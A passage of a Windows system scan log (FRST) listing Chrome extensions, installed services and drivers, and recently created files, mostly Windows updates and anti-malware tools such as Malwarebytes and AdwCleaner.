CHR Profile: C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-07-07]
CHR Extension: (Google Drive) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-07-07]
CHR Extension: (YouTube) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-07-07]
CHR Extension: (Google Search) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-07-07]
CHR Extension: (Website Logon) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\kanflfepiobnpjbljmngfgegijhdpljm [2014-07-07]
CHR Extension: (Google Wallet) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-07-07]
CHR Extension: (Gmail) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-07-07]
CHR HKLM\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\Exts\Chrome.crx [2015-12-24]
CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\Exts\Chrome.crx [2015-12-24]
CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [kanflfepiobnpjbljmngfgegijhdpljm] - C:\Program Files (x86)\HP SimplePass\tschrome.crx [2013-04-01]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S2 EgisTec Service; C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\EgisService.exe [689008 2010-03-25] (Egis Technology Inc. )
R2 Fitbit Connect; C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe [5738528 2014-11-07] (Fitbit, Inc.) [File not signed]
R2 FPLService; C:\Program Files (x86)\HP SimplePass\TrueSuiteService.exe [1641768 2013-06-07] (HP)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe [46904 2013-12-17] (Hewlett-Packard Company)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [330136 2015-10-30] (Intel Corporation)
R2 IJPLMSVC; C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE [140456 2012-03-27] ()
R2 Intel® ME Service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe [128896 2012-07-17] (Intel Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [165760 2012-07-17] (Intel Corporation)
R2 MBAMScheduler; C:\Users\levilaing\Desktop\Malwarebytes Anti-Malware\mbamscheduler.exe [1513784 2015-10-05] (Malwarebytes)
R2 MBAMService; C:\Users\levilaing\Desktop\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
R2 NS; C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\NS.exe [282016 2015-11-20] (Symantec Corporation)
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [246472 2015-07-17] (Synaptics Incorporated)
S3 TrueService; C:\Program Files\Common Files\AuthenTec\TrueService.exe [401856 2013-01-07] (AuthenTec, Inc.)
R2 valWBFPolicyService; C:\Windows\system32\valWBFPolicyService.exe [28160 2012-09-06] () [File not signed]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-30] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-10-30] (Microsoft Corporation)
S2 EraserSvc11511; "C:\Program Files (x86)\Norton Security\Engine\22.5.4.24\NS.exe" /h ccCommon [X]

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 BHDrvx64; C:\Program Files (x86)\Norton Security\NortonData\22.5.4.24\Definitions\BASHDefs\20160213.003\BHDrvx64.sys [1665608 2015-10-08] (Symantec Corporation)
R1 ccSet_NS; C:\Windows\system32\drivers\NSx64\1605050.00F\ccSetx64.sys [173808 2015-09-23] (Symantec Corporation)
R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [92536 2012-06-25] (CyberLink)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [498512 2015-12-23] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [157520 2015-12-23] (Symantec Corporation)
R1 IDSVia64; C:\Program Files (x86)\Norton Security\NortonData\22.5.4.24\Definitions\IPSDefs\20160309.001\IDSvia64.sys [767224 2016-02-15] (Symantec Corporation)
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-03-09] (Malwarebytes)
R3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
R3 NAVENG; C:\Program Files (x86)\Norton Security\NortonData\22.5.4.24\Definitions\VirusDefs\20160309.020\ENG64.SYS [138488 2015-12-23] (Symantec Corporation)
R3 NAVEX15; C:\Program Files (x86)\Norton Security\NortonData\22.5.4.24\Definitions\VirusDefs\20160309.020\EX64.SYS [2148080 2015-12-23] (Symantec Corporation)
R3 netr28x; C:\Windows\system32\DRIVERS\netr28x.sys [2554528 2015-06-12] (MediaTek Inc.)
S3 RSP2STOR; C:\Windows\system32\DRIVERS\RtsP2Stor.sys [310528 2015-06-05] (Realtek Semiconductor Corp.)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [589824 2015-10-30] (Realtek )
S3 SmbDrv; C:\Windows\System32\drivers\Smb_driver_AMDASF.sys [41272 2012-08-24] (Synaptics Incorporated)
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [42696 2015-07-17] (Synaptics Incorporated)
R3 SRTSP; C:\Windows\System32\Drivers\NSx64\1605050.00F\SRTSP64.SYS [928496 2015-11-11] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\NSx64\1605050.00F\SRTSPX64.SYS [50936 2015-09-23] (Symantec Corporation)
R0 SymEFASI; C:\Windows\System32\drivers\NSx64\1605050.00F\SYMEFASI64.SYS [1621232 2015-11-11] (Symantec Corporation)
S4 SymELAM; C:\Windows\system32\drivers\NSx64\1605050.00F\SymELAM.sys [24192 2015-09-23] (Symantec Corporation)
R3 SymEvent; C:\WINDOWS\system32\Drivers\SYMEVENT64x86.SYS [111344 2015-12-24] (Symantec Corporation)
R1 SymIRON; C:\Windows\system32\drivers\NSx64\1605050.00F\Ironx64.SYS [297720 2015-09-23] (Symantec Corporation)
R1 SymNetS; C:\Windows\System32\Drivers\NSx64\1605050.00F\SYMNETS.SYS [577768 2015-11-11] (Symantec Corporation)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-10-30] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [293216 2015-10-30] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [118112 2015-10-30] (Microsoft Corporation)
R3 WirelessButtonDriver; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [20800 2013-02-08] (Hewlett-Packard Development Company, L.P.)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-03-09 20:35 - 2016-03-09 20:35 - 00026260 _____ C:\Users\levilaing\Desktop\FRST.txt
2016-03-09 19:47 - 2016-03-09 19:47 - 00008389 _____ C:\Users\levilaing\Desktop\MBAM.txt
2016-03-09 18:32 - 2016-03-09 20:33 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-03-09 18:31 - 2016-03-09 18:31 - 00000910 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-03-09 18:31 - 2016-03-09 18:31 - 00000000 ____D C:\Users\levilaing\Desktop\Malwarebytes Anti-Malware
2016-03-09 18:31 - 2016-03-09 18:31 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-03-09 18:31 - 2016-03-09 18:31 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-03-09 18:31 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-03-09 18:31 - 2015-10-05 09:50 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2016-03-09 18:31 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2016-03-09 18:28 - 2016-03-09 18:28 - 22908888 _____ (Malwarebytes ) C:\Users\levilaing\Downloads\mbam-setup-2.2.0.1024.exe
2016-03-09 17:42 - 2016-03-09 17:42 - 01609216 _____ (Malwarebytes) C:\Users\levilaing\Downloads\JRT.exe
2016-03-09 17:27 - 2016-03-09 17:33 - 00000000 ____D C:\Program Files (x86)\AdwCleaner
2016-03-09 17:26 - 2016-03-09 17:26 - 01524224 _____ C:\Users\levilaing\Downloads\adwcleaner_5.101.exe
2016-03-09 16:34 - 2016-02-24 03:51 - 07474528 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-03-09 16:34 - 2016-02-24 03:28 - 03449168 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSService.dll
2016-03-09 16:34 - 2016-02-24 02:46 - 06607080 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2016-03-09 16:34 - 2016-02-24 02:11 - 01997152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2016-03-09 16:34 - 2016-02-24 02:06 - 05242496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2016-03-09 16:34 - 2016-02-24 00:43 - 00286720 _____ (Microsoft Corporation) C:\WINDOWS\system32\deviceaccess.dll
2016-03-09 16:34 - 2016-02-24 00:40 - 01224704 _____ (Microsoft Corporation) C:\WINDOWS\system32\Unistore.dll
2016-03-09 16:34 - 2016-02-24 00:39 - 01390592 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2016-03-09 16:34 - 2016-02-24 00:11 - 03593216 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-03-09 16:34 - 2016-02-24 00:09 - 00228352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\deviceaccess.dll
2016-03-09 16:34 - 2016-02-24 00:07 - 00949248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Unistore.dll
2016-03-09 16:34 - 2016-02-24 00:01 - 01831936 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.dll
2016-03-09 16:34 - 2016-02-24 00:00 - 02273792 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-03-09 16:34 - 2016-02-24 00:00 - 01098752 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2016-03-09 16:34 - 2016-02-23 23:55 - 01996288 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncProvider.dll
2016-03-09 16:34 - 2016-02-23 23:34 - 01707520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActiveSyncProvider.dll
2016-03-09 16:34 - 2016-02-23 23:20 - 22376960 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-03-09 16:34 - 2016-02-23 23:18 - 18677760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-03-09 16:34 - 2016-02-23 23:12 - 19339776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-03-09 16:34 - 2016-02-23 23:12 - 05321728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2016-03-09 16:34 - 2016-02-23 23:10 - 24600576 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-03-09 16:34 - 2016-02-23 23:09 - 06972416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2016-03-09 16:34 - 2016-02-23 23:05 - 12586496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll
2016-03-09 16:34 - 2016-02-23 23:03 - 14252544 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll
2016-03-09 16:34 - 2016-02-23 22:59 - 05661696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-03-09 16:34 - 2016-02-23 22:55 - 07835648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-03-09 16:33 - 2016-02-29 23:31 - 00848168 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2016-03-09 16:33 - 2016-02-29 23:22 - 00709688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2016-03-09 16:33 - 2016-02-24 03:52 - 01997328 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-03-09 16:33 - 2016-02-24 03:48 - 00713568 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2016-03-09 16:33 - 2016-02-24 03:47 - 01173344 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-03-09 16:33 - 2016-02-24 03:40 - 00513888 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2016-03-09 16:33 - 2016-02-24 03:34 - 01613664 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2016-03-09 16:33 - 2016-02-24 03:15 - 01557768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2016-03-09 16:33 - 2016-02-24 02:58 - 00794888 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfds.dll
2016-03-09 16:33 - 2016-02-24 02:54 - 00127840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBSTOR.SYS
2016-03-09 16:33 - 2016-02-24 02:51 - 01322248 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2016-03-09 16:33 - 2016-02-24 02:50 - 00808800 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2016-03-09 16:33 - 2016-02-24 02:43 - 00625000 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2016-03-09 16:33 - 2016-02-24 02:39 - 00358752 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2016-03-09 16:33 - 2016-02-24 02:39 - 00141560 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthHost.exe
2016-03-09 16:33 - 2016-02-24 02:19 - 00670928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfds.dll
2016-03-09 16:33 - 2016-02-24 02:14 - 00216416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2016-03-09 16:33 - 2016-02-24 02:11 - 00957608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2016-03-09 16:33 - 2016-02-24 02:11 - 00703840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2016-03-09 16:33 - 2016-02-24 02:11 - 00652392 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxgi.dll
2016-03-09 16:33 - 2016-02-24 02:11 - 00394080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2016-03-09 16:33 - 2016-02-24 02:11 - 00258280 _____ (Microsoft Corporation) C:\WINDOWS\system32\sqmapi.dll
2016-03-09 16:33 - 2016-02-24 02:10 - 00630632 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2016-03-09 16:33 - 2016-02-24 02:10 - 00576864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2016-03-09 16:33 - 2016-02-24 02:09 - 00640472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2016-03-09 16:33 - 2016-02-24 02:09 - 00147808 _____ (Microsoft Corporation) C:\WINDOWS\system32\wermgr.exe
2016-03-09 16:33 - 2016-02-24 01:59 - 00294752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2016-03-09 16:33 - 2016-02-24 01:39 - 00045568 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTypeHelperUtil.dll
2016-03-09 16:33 - 2016-02-24 01:39 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExtrasXmlParser.dll
2016-03-09 16:33 - 2016-02-24 01:38 - 00187744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2016-03-09 16:33 - 2016-02-24 01:38 - 00111616 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2016-03-09 16:33 - 2016-02-24 01:37 - 00045056 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataLanguageUtil.dll
2016-03-09 16:33 - 2016-02-24 01:36 - 00060416 _____ (Microsoft Corporation) C:\WINDOWS\system32\PimIndexMaintenanceClient.dll
2016-03-09 16:33 - 2016-02-24 01:35 - 00540752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2016-03-09 16:33 - 2016-02-24 01:35 - 00523752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxgi.dll
2016-03-09 16:33 - 2016-02-24 01:35 - 00220064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sqmapi.dll
2016-03-09 16:33 - 2016-02-24 01:35 - 00045568 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2016-03-09 16:33 - 2016-02-24 01:33 - 00538736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2016-03-09 16:33 - 2016-02-24 01:33 - 00141664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wermgr.exe
2016-03-09 16:33 - 2016-02-24 01:31 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontsub.dll
2016-03-09 16:33 - 2016-02-24 01:30 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\system32\wfapigp.dll
2016-03-09 16:33 - 2016-02-24 01:28 - 00070656 _____ (Microsoft Corporation) C:\WINDOWS\system32\POSyncServices.dll
2016-03-09 16:33 - 2016-02-24 01:23 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
2016-03-09 16:33 - 2016-02-24 01:23 - 00068096 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataPlatformHelperUtil.dll
2016-03-09 16:33 - 2016-02-24 01:22 - 00196608 _____ (Microsoft Corporation) C:\WINDOWS\system32\fwpolicyiomgr.dll
2016-03-09 16:33 - 2016-02-24 01:20 - 00195072 _____ (Microsoft Corporation) C:\WINDOWS\system32\VCardParser.dll
2016-03-09 16:33 - 2016-02-24 01:20 - 00167936 _____ (Microsoft Corporation) C:\WINDOWS\system32\dafBth.dll
2016-03-09 16:33 - 2016-02-24 01:20 - 00087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxSysprep.dll
2016-03-09 16:33 - 2016-02-24 01:19 - 00145408 _____ (Microsoft Corporation) C:\WINDOWS\system32\dssvc.dll
2016-03-09 16:33 - 2016-02-24 01:19 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\seclogon.dll
2016-03-09 16:33 - 2016-02-24 01:15 - 00365568 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2016-03-09 16:33 - 2016-02-24 01:14 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExSMime.dll
2016-03-09 16:33 - 2016-02-24 01:13 - 00121856 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentActivation.dll
2016-03-09 16:33 - 2016-02-24 01:12 - 00243712 _____ (Microsoft Corporation) C:\WINDOWS\system32\cemapi.dll
2016-03-09 16:33 - 2016-02-24 01:12 - 00221184 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneCallHistoryApis.dll
2016-03-09 16:33 - 2016-02-24 01:10 - 00093184 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpninprc.dll
2016-03-09 16:33 - 2016-02-24 01:09 - 00258560 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataAccountApis.dll
2016-03-09 16:33 - 2016-02-24 01:09 - 00161792 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxSip.dll
2016-03-09 16:33 - 2016-02-24 01:07 - 00252928 _____ (Microsoft Corporation) C:\WINDOWS\system32\PimIndexMaintenance.dll
2016-03-09 16:33 - 2016-02-24 01:05 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll
2016-03-09 16:33 - 2016-02-24 01:03 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2016-03-09 16:33 - 2016-02-24 01:02 - 00161280 _____ (Microsoft Corporation) C:\WINDOWS\system32\CallHistoryClient.dll
2016-03-09 16:33 - 2016-02-24 01:01 - 00764928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-03-09 16:33 - 2016-02-24 01:01 - 00146432 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthBroker.dll
2016-03-09 16:33 - 2016-02-24 01:01 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\system32\profext.dll
2016-03-09 16:33 - 2016-02-24 01:00 - 00214528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Scanners.dll
2016-03-09 16:33 - 2016-02-24 00:59 - 00450560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Bluetooth.dll
2016-03-09 16:33 - 2016-02-24 00:59 - 00360448 _____ (Microsoft Corporation) C:\WINDOWS\system32\vaultsvc.dll
2016-03-09 16:33 - 2016-02-24 00:59 - 00318976 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2016-03-09 16:33 - 2016-02-24 00:58 - 00685568 _____ (Microsoft Corporation) C:\WINDOWS\system32\scapi.dll
2016-03-09 16:33 - 2016-02-24 00:55 - 00790528 _____ (Microsoft Corporation) C:\WINDOWS\system32\EmailApis.dll
2016-03-09 16:33 - 2016-02-24 00:55 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\system32\PackageStateRoaming.dll
2016-03-09 16:33 - 2016-02-24 00:55 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExtrasXmlParser.dll
2016-03-09 16:33 - 2016-02-24 00:54 - 00526336 _____ (Microsoft Corporation) C:\WINDOWS\system32\FirewallAPI.dll
2016-03-09 16:33 - 2016-02-24 00:54 - 00288768 _____ (Microsoft Corporation) C:\WINDOWS\system32\vaultcli.dll
2016-03-09 16:33 - 2016-02-24 00:54 - 00228352 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsqmcons.exe
2016-03-09 16:33 - 2016-02-24 00:54 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTypeHelperUtil.dll
2016-03-09 16:33 - 2016-02-24 00:53 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2016-03-09 16:33 - 2016-02-24 00:53 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataLanguageUtil.dll
2016-03-09 16:33 - 2016-02-24 00:52 - 00451584 _____ (Microsoft Corporation) C:\WINDOWS\system32\werui.dll
2016-03-09 16:33 - 2016-02-24 00:52 - 00048128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PimIndexMaintenanceClient.dll
2016-03-09 16:33 - 2016-02-24 00:51 - 00037376 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2016-03-09 16:33 - 2016-02-24 00:49 - 00726528 _____ (Microsoft Corporation) C:\WINDOWS\system32\ChatApis.dll
2016-03-09 16:33 - 2016-02-24 00:47 - 00093696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontsub.dll
2016-03-09 16:33 - 2016-02-24 00:46 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wfapigp.dll
2016-03-09 16:33 - 2016-02-24 00:44 - 01713664 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRHInproc.dll
2016-03-09 16:33 - 2016-02-24 00:44 - 00915456 _____ (Microsoft Corporation) C:\WINDOWS\system32\configurationclient.dll
2016-03-09 16:33 - 2016-02-24 00:44 - 00700416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentApis.dll
2016-03-09 16:33 - 2016-02-24 00:44 - 00056320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\POSyncServices.dll
2016-03-09 16:33 - 2016-02-24 00:43 - 00957952 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
2016-03-09 16:33 - 2016-02-24 00:41 - 00982016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxPackaging.dll
2016-03-09 16:33 - 2016-02-24 00:41 - 00436736 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2016-03-09 16:33 - 2016-02-24 00:40 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
2016-03-09 16:33 - 2016-02-24 00:40 - 00056320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataPlatformHelperUtil.dll
2016-03-09 16:33 - 2016-02-24 00:39 - 00164864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fwpolicyiomgr.dll
2016-03-09 16:33 - 2016-02-24 00:38 - 00150528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VCardParser.dll
2016-03-09 16:33 - 2016-02-24 00:36 - 01847808 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPDMC.exe
2016-03-09 16:33 - 2016-02-24 00:34 - 00938496 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContactApis.dll
2016-03-09 16:33 - 2016-02-24 00:34 - 00303104 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2016-03-09 16:33 - 2016-02-24 00:32 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExSMime.dll
2016-03-09 16:33 - 2016-02-24 00:32 - 00098304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentActivation.dll
2016-03-09 16:33 - 2016-02-24 00:31 - 00200704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cemapi.dll
2016-03-09 16:33 - 2016-02-24 00:31 - 00169984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhoneCallHistoryApis.dll
2016-03-09 16:33 - 2016-02-24 00:28 - 00870912 _____ (Microsoft Corporation) C:\WINDOWS\system32\MPSSVC.dll
2016-03-09 16:33 - 2016-02-24 00:28 - 00196608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataAccountApis.dll
2016-03-09 16:33 - 2016-02-24 00:28 - 00135168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxSip.dll
2016-03-09 16:33 - 2016-02-24 00:25 - 00401408 _____ (Microsoft Corporation) C:\WINDOWS\system32\sharemediacpl.dll
2016-03-09 16:33 - 2016-02-24 00:23 - 00129024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CallHistoryClient.dll
2016-03-09 16:33 - 2016-02-24 00:22 - 00053248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\profext.dll
2016-03-09 16:33 - 2016-02-24 00:21 - 00315904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Bluetooth.dll
2016-03-09 16:33 - 2016-02-24 00:21 - 00168448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Scanners.dll
2016-03-09 16:33 - 2016-02-24 00:18 - 01490432 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataService.dll
2016-03-09 16:33 - 2016-02-24 00:18 - 00575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EmailApis.dll
2016-03-09 16:33 - 2016-02-24 00:18 - 00184832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PackageStateRoaming.dll
2016-03-09 16:33 - 2016-02-24 00:17 - 00369664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FirewallAPI.dll
2016-03-09 16:33 - 2016-02-24 00:16 - 00394752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\werui.dll
